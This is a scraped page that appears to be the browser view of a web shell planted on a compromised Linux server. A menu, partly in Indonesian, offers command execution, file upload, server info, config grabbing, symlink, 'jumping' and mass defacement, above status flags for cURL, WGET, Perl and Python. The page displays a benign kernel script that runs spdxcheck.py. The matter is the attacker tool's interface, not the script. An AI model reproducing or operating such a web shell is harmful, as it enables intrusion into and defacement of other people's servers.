OFF | cURL : OFF | WGET : ON | Perl : ON | Python : OFF Directory (0755) : /var/../libx32/../src/linux-headers-5.4.0-198-generic/scripts/ |
Home | ☍ Command | ☍ Upload File | ☍Info Server | ☍ Buat File | ☍ Mass deface | ☍ Jumping | ☍ Config | ☍ Symlink | ☍ About |
---|
#!/bin/sh for PYTHON in python2 python3; do # run check on a text and a binary file for FILE in Makefile Documentation/logo.gif; do $PYTHON scripts/spdxcheck.py $FILE $PYTHON scripts/spdxcheck.py - < $FILE done # run check on complete tree to catch any other issues $PYTHON scripts/spdxcheck.py > /dev/null done